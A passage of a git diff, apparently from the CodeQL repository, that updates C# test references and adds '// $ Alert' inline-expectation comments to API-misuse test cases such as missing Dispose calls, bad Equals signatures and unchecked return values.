-shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/operators/PrintAst.qlref b/csharp/ql/test/library-tests/operators/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/operators/PrintAst.qlref +++ b/csharp/ql/test/library-tests/operators/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/partial/PrintAst.qlref b/csharp/ql/test/library-tests/partial/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/partial/PrintAst.qlref +++ b/csharp/ql/test/library-tests/partial/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/properties/PrintAst.qlref b/csharp/ql/test/library-tests/properties/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/properties/PrintAst.qlref +++ b/csharp/ql/test/library-tests/properties/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/statements/PrintAst.qlref b/csharp/ql/test/library-tests/statements/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/statements/PrintAst.qlref +++ b/csharp/ql/test/library-tests/statements/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/stringinterpolation/PrintAst.qlref b/csharp/ql/test/library-tests/stringinterpolation/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/stringinterpolation/PrintAst.qlref +++ b/csharp/ql/test/library-tests/stringinterpolation/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/types/PrintAst.qlref b/csharp/ql/test/library-tests/types/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/types/PrintAst.qlref +++ b/csharp/ql/test/library-tests/types/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/unsafe/PrintAst.qlref b/csharp/ql/test/library-tests/unsafe/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/unsafe/PrintAst.qlref +++ b/csharp/ql/test/library-tests/unsafe/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollect.qlref b/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollect.qlref index ca6961e370bf..c911197abb35 100644 --- a/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollect.qlref +++ b/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollect.qlref @@ -1 +1,2 @@ -API Abuse/CallToGCCollect.ql \ No newline at end of file +query: API Abuse/CallToGCCollect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollectBad.cs b/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollectBad.cs index acc30b87c8d9..b081d201f10d 100644 --- a/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollectBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollectBad.cs @@ -4,6 +4,6 @@ class Bad { void M() { - GC.Collect(); + GC.Collect(); // $ Alert } } diff --git a/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.cs b/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.cs index c546c406f310..ea0ffeeb7645 100644 --- a/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.cs +++ b/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.cs @@ -16,7 +16,7 @@ static void NotObsoleteMethod() static void Main(string[] args) { // BAD: Call to obsolete method - ObsoleteMethod(); + ObsoleteMethod(); // $ Alert // GOOD: Call to non-obsolete method NotObsoleteMethod(); diff --git a/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.qlref b/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.qlref index 08b2c9a51d4e..028fb010e8ef 100644 --- a/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.qlref +++ b/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.qlref @@ -1 +1,2 @@ -API Abuse/CallToObsoleteMethod.ql \ No newline at end of file +query: API Abuse/CallToObsoleteMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethodBad.cs b/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethodBad.cs index c8c10de283d5..9ea4f5b80a44 100644 --- a/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethodBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethodBad.cs @@ -4,7 +4,7 @@ class Bad { void M() { - Logger.Log("Hello, World!"); + Logger.Log("Hello, World!"); // $ Alert } static class Logger diff --git a/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.cs b/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.cs index a2e5f7333e9e..865b31f2ca07 100644 --- a/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.cs +++ b/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.cs @@ -1,7 +1,7 @@ using System; // BAD -class Incorrect +class Incorrect // $ Alert { public static bool operator ==(Incorrect a, Incorrect b) => default(bool); public static bool operator !=(Incorrect a, Incorrect b) => !(a == b); @@ -21,7 +21,7 @@ class Correct } // BAD: needs to redefine Equals -class IncorrectOverrides : Correct +class IncorrectOverrides : Correct // $ Alert { public static bool operator ==(IncorrectOverrides a, IncorrectOverrides b) => default(bool); public static bool operator !=(IncorrectOverrides a, IncorrectOverrides b) => !(a == b); @@ -47,7 +47,7 @@ static void Main(string[] args) } // BAD: should also implement Equals. -class MyEquatable : IEquatable +class MyEquatable : IEquatable // $ Alert { public bool Equals(MyEquatable other) { diff --git a/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.qlref b/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.qlref index 5ffe8a70dec4..9b025e76c304 100644 --- a/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.qlref +++ b/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.qlref @@ -1 +1,2 @@ -API Abuse/ClassDoesNotImplementEquals.ql \ No newline at end of file +query: API Abuse/ClassDoesNotImplementEquals.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEqualsBad.cs b/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEqualsBad.cs index 619f462a96c8..305bd87c2cf8 100644 --- a/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEqualsBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEqualsBad.cs @@ -21,7 +21,7 @@ public override bool Equals(object obj) } } - class GasolineCar : Car + class GasolineCar : Car // $ Alert { protected bool unleaded; diff --git a/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneable.qlref b/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneable.qlref index e597d142a2d1..65eb6ca729d1 100644 --- a/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneable.qlref +++ b/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneable.qlref @@ -1 +1,2 @@ -API Abuse/ClassImplementsICloneable.ql \ No newline at end of file +query: API Abuse/ClassImplementsICloneable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneableBad.cs b/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneableBad.cs index 0999bd87d281..e1636158bf2f 100644 --- a/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneableBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneableBad.cs @@ -8,7 +8,7 @@ class Thing public Thing(int i) { I = i; } } - class Shallow : ICloneable + class Shallow : ICloneable // $ Alert { public Thing T { get; set; } public Shallow(Thing t) { T = t; } @@ -17,7 +17,7 @@ class Shallow : ICloneable public object Clone() { return new Shallow(T); } } - class Deep : ICloneable + class Deep : ICloneable // $ Alert { public Thing T { get; set; } public Deep(Thing t) { T = t; } diff --git a/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.cs b/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.cs index acde0fc477f7..31505eb740c6 100644 --- a/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.cs +++ b/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.cs @@ -45,17 +45,17 @@ public void Method() // BAD: No Dispose call in case of exception SqlConnection c1d = new SqlConnection(); c1d.Open(); - c1d.Dispose(); + c1d.Dispose(); // $ Alert // BAD: No Dispose call in case of exception SqlConnection c1e = new SqlConnection(); Throw1(c1e); - c1e.Dispose(); + c1e.Dispose(); // $ Alert // BAD: No Dispose call in case of exception SqlConnection c1f = new SqlConnection(); Throw2(c1f); - c1f.Dispose(); + c1f.Dispose(); // $ Alert // GOOD: using declaration using SqlConnection c2 = new SqlConnection(""); diff --git a/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.qlref b/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.qlref index d55f9b7dcba7..4273ca0a55c6 100644 --- a/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.qlref +++ b/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.qlref @@ -1 +1,2 @@ -API Abuse/DisposeNotCalledOnException.ql \ No newline at end of file +query: API Abuse/DisposeNotCalledOnException.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnExceptionBad.cs b/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnExceptionBad.cs index c0674285bba1..22827a1e3d03 100644 --- a/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnExceptionBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnExceptionBad.cs @@ -11,8 +11,8 @@ public SqlDataReader GetAllCustomers() var cmd = new SqlCommand("SELECT * FROM Customers", conn); var ret = cmd.ExecuteReader(); - cmd.Dispose(); - conn.Dispose(); + cmd.Dispose(); // $ Alert + conn.Dispose(); // $ Alert return ret; } diff --git a/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.cs b/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.cs index 8e8b8f8430b3..f05764f99c55 100644 --- a/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.cs +++ b/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.cs @@ -1,6 +1,6 @@ using System; -class ClassMissingGetHashCode +class ClassMissingGetHashCode // $ Alert { public override bool Equals(object other) { @@ -13,7 +13,7 @@ public override bool Equals(object other) } } -class ClassMissingEquals +class ClassMissingEquals // $ Alert { public new bool Equals(object other) { // not overridden diff --git a/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.qlref b/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.qlref index 6425e440f739..26171a4ca75d 100644 --- a/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.qlref +++ b/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.qlref @@ -1 +1,2 @@ -API Abuse/InconsistentEqualsGetHashCode.ql \ No newline at end of file +query: API Abuse/InconsistentEqualsGetHashCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCodeBad.cs b/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCodeBad.cs index 6b3b95966dc9..00da432846f3 100644 --- a/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCodeBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCodeBad.cs @@ -1,6 +1,6 @@ using System; -class Bad +class Bad // $ Alert { private int id; diff --git a/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.cs b/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.cs index 5b5780ed9778..5e566b926814 100644 --- a/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.cs +++ b/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.cs @@ -2,7 +2,7 @@ class C1 { - public int CompareTo(T other) => throw null; // BAD + public int CompareTo(T other) => throw null; // BAD // $ Alert } class C2 { } diff --git a/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.qlref b/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.qlref index 23abf6ab339d..afab98e27ce5 100644 --- a/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.qlref +++ b/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.qlref @@ -1 +1,2 @@ -API Abuse/IncorrectCompareToSignature.ql \ No newline at end of file +query: API Abuse/IncorrectCompareToSignature.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignatureBad.cs b/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignatureBad.cs index efeb55ce65bc..33b1e3ad8d45 100644 --- a/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignatureBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignatureBad.cs @@ -2,5 +2,5 @@ class Bad { - public int CompareTo(Bad b) => 0; + public int CompareTo(Bad b) => 0; // $ Alert } diff --git a/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.cs b/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.cs index effb17a558a2..f858cc35a0fc 100644 --- a/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.cs +++ b/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.cs @@ -3,7 +3,7 @@ // BAD class Incorrect { - public bool Equals(Incorrect other) => false; + public bool Equals(Incorrect other) => false; // $ Alert } // GOOD diff --git a/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.qlref b/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.qlref index f56496da8be1..c05a5f0af8d0 100644 --- a/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.qlref +++ b/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.qlref @@ -1 +1,2 @@ -API Abuse/IncorrectEqualsSignature.ql \ No newline at end of file +query: API Abuse/IncorrectEqualsSignature.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignatureBad.cs b/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignatureBad.cs index 723110d1de11..7b03d029eb8a 100644 --- a/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignatureBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignatureBad.cs @@ -9,6 +9,6 @@ public Bad(int Id) this.id = Id; } - public bool Equals(Bad b) => + public bool Equals(Bad b) => // $ Alert this.id == b.id; } diff --git a/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.cs b/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.cs index dd069476b1bb..b71c2f2a5c93 100644 --- a/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.cs +++ b/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.cs @@ -20,7 +20,7 @@ class C1 : IDisposable C1 Field1; // GOOD C1 Field2; // BAD - public virtual void Dispose() + public virtual void Dispose() // $ Alert { Field1.Dispose(); } @@ -31,7 +31,7 @@ class C2 : C1 C1 Field1; // GOOD C1 Field2; // BAD - public override void Dispose() + public override void Dispose() // $ Alert { base.Dispose(); Field1.Dispose(); @@ -49,7 +49,7 @@ class C5 : C4 C1 Field1; // GOOD C1 Field2; // BAD - public override void Dispose(bool disposing) + public override void Dispose(bool disposing) // $ Alert { base.Dispose(disposing); if (disposing) @@ -64,7 +64,7 @@ class C6 : Component C1 Field1; // GOOD C1 Field2; // BAD - protected override void Dispose(bool disposing) + protected override void Dispose(bool disposing) // $ Alert { base.Dispose(disposing); if (disposing) diff --git a/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.qlref b/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.qlref index a1d172302306..442cf4780c15 100644 --- a/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.qlref +++ b/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.qlref @@ -1 +1,2 @@ -API Abuse/MissingDisposeCall.ql \ No newline at end of file +query: API Abuse/MissingDisposeCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCallBad.cs b/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCallBad.cs index 6386abc84003..ed3a1851c87f 100644 --- a/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCallBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCallBad.cs @@ -6,7 +6,7 @@ class Bad : IDisposable private FileStream stream1 = new FileStream("a.txt", FileMode.Open); private FileStream stream2 = new FileStream("b.txt", FileMode.Open); - public void Dispose() + public void Dispose() // $ Alert { stream1.Dispose(); } diff --git a/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.cs b/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.cs index 1e71bba55eb2..998bc757cd55 100644 --- a/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.cs +++ b/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.cs @@ -25,7 +25,7 @@ public virtual void Dispose() } } -class C2 : C1 +class C2 : C1 // $ Alert { C2 Field; // BAD } @@ -41,13 +41,13 @@ public override void Dispose() } } -class WebPage : Page +class WebPage : Page // $ Alert { C1 Field1; // BAD Control Field2; // GOOD } -class WebControl : Control +class WebControl : Control // $ Alert { C1 Field1; // BAD Control Field2; // GOOD @@ -73,12 +73,12 @@ public override void Dispose(bool disposing) } } -class C6 : C4 +class C6 : C4 // $ Alert { C2 Field; // BAD } -class C7 : Component +class C7 : Component // $ Alert { C2 Field; // BAD } @@ -97,7 +97,7 @@ protected override void Dispose(bool disposing) } } -class C9 : C1 +class C9 : C1 // $ Alert { C2 Field; // BAD diff --git a/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.qlref b/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.qlref index 61be6bbcf704..d9cb769bef36 100644 --- a/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.qlref +++ b/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.qlref @@ -1 +1,2 @@ -API Abuse/MissingDisposeMethod.ql \ No newline at end of file +query: API Abuse/MissingDisposeMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethodBad.cs b/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethodBad.cs index db8067735cfb..5cc9d68d7fae 100644 --- a/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethodBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethodBad.cs @@ -11,7 +11,7 @@ public virtual void Dispose() } } -class Bad : BadBase +class Bad : BadBase // $ Alert { private FileStream stream2 = new FileStream("b.txt", FileMode.Open); } diff --git a/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.cs b/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.cs index b2cb30b17ada..a35d0d0b51a5 100644 --- a/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.cs +++ b/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.cs @@ -12,13 +12,13 @@ class C1 class C2 : C1 { // BAD: M1 does not override C1.M1 - public int M1() { return 1; } + public int M1() { return 1; } // $ Alert // GOOD: M2 overrides using the explicit keyword "override" public override int M2() { return 2; } // BAD: M3 does not override C1.M3 - public IEnumerable M3() { return null; } + public IEnumerable M3() { return null; } // $ Alert // GOOD: M4 overrides using the explicit keyword "override" public override IEnumerable M4() { return null; } diff --git a/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.qlref b/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.qlref index fb31441316c0..7fe57a6c15cb 100644 --- a/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.qlref +++ b/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.qlref @@ -1 +1,2 @@ -API Abuse/NonOverridingMethod.ql \ No newline at end of file +query: API Abuse/NonOverridingMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethodBad.cs b/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethodBad.cs index cb76d9ab9947..8641dd60fbe7 100644 --- a/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethodBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethodBad.cs @@ -7,6 +7,6 @@ public virtual void Foo() { } class Sub : Super { - public void Foo() { } + public void Foo() { } // $ Alert } } diff --git a/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.cs b/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.cs index 08219f61a73e..674205965a93 100644 --- a/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.cs +++ b/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.cs @@ -3,16 +3,16 @@ class NullArgumentToEquals void M() { int i = 0; - i.Equals(null); // BAD + i.Equals(null); // BAD // $ Alert int? i2 = null; i2.Equals(null); // GOOD C c = null; - c.Equals(null); // BAD + c.Equals(null); // BAD // $ Alert object o = null; - o.Equals(null); // BAD + o.Equals(null); // BAD // $ Alert } class C diff --git a/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.qlref b/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.qlref index c6b40febef05..12129a164b04 100644 --- a/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.qlref +++ b/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.qlref @@ -1 +1,2 @@ -API Abuse/NullArgumentToEquals.ql \ No newline at end of file +query: API Abuse/NullArgumentToEquals.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEqualsBad.cs b/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEqualsBad.cs index 612aaa2b1ac6..932ced4ef4a2 100644 --- a/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEqualsBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEqualsBad.cs @@ -1,4 +1,4 @@ class Bad { - bool IsNull(object o) => o.Equals(null); + bool IsNull(object o) => o.Equals(null); // $ Alert } diff --git a/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.cs b/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.cs index cf290a84bcbb..837526eb236c 100644 --- a/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.cs +++ b/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.cs @@ -21,7 +21,7 @@ static void Main(string[] args) ret = intHashSet.Add(42); // BAD: - stringHashSet.Add("42"); + stringHashSet.Add("42"); // $ Alert } } @@ -64,8 +64,8 @@ static void Main(string[] args) ret = s.Read(null, 0, 0); ret = s.Read(null, 0, 0); ret = s.Read(null, 0, 0); - s.Read(null, 0, 0); // always check - s.ReadByte(); // always check + s.Read(null, 0, 0); // always check // $ Alert + s.ReadByte(); // always check // $ Alert } } @@ -82,7 +82,7 @@ static void M() ret1 = M1(); ret1 = M1(); ret1 = M1(); - M1(); // BAD + M1(); // BAD // $ Alert M1(); // GOOD var ret2 = M2(); @@ -103,7 +103,7 @@ static void M() ret2 = M2(); ret2 = M2(); ret2 = M2(); - M2(); // BAD + M2(); // BAD // $ Alert var ret3 = M3(null); ret3 = M3(null); @@ -115,7 +115,7 @@ static void M() ret3 = M3(null); ret3 = M3(null); M3(null); // GOOD - M3(null); // BAD + M3(null); // BAD // $ Alert M3(null); // GOOD } diff --git a/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.qlref b/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.qlref index ca9751d2857a..c04faa8008ad 100644 --- a/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.qlref +++ b/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.qlref @@ -1 +1,2 @@ -API Abuse/UncheckedReturnValue.ql \ No newline at end of file +query: API Abuse/UncheckedReturnValue.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValueBad.cs b/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValueBad.cs index 394906e70241..6d9743172c29 100644 --- a/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValueBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValueBad.cs @@ -26,13 +26,13 @@ public void IgnoreOne() if (DoPrint("I")) Console.WriteLine("I"); - DoPrint("J"); + DoPrint("J"); // $ Alert } void IgnoreRead(string path) { var file = new byte[10]; using (var f = new FileStream(path, FileMode.Open)) - f.Read(file, 0, file.Length); + f.Read(file, 0, file.Length); // $ Alert } } diff --git a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref 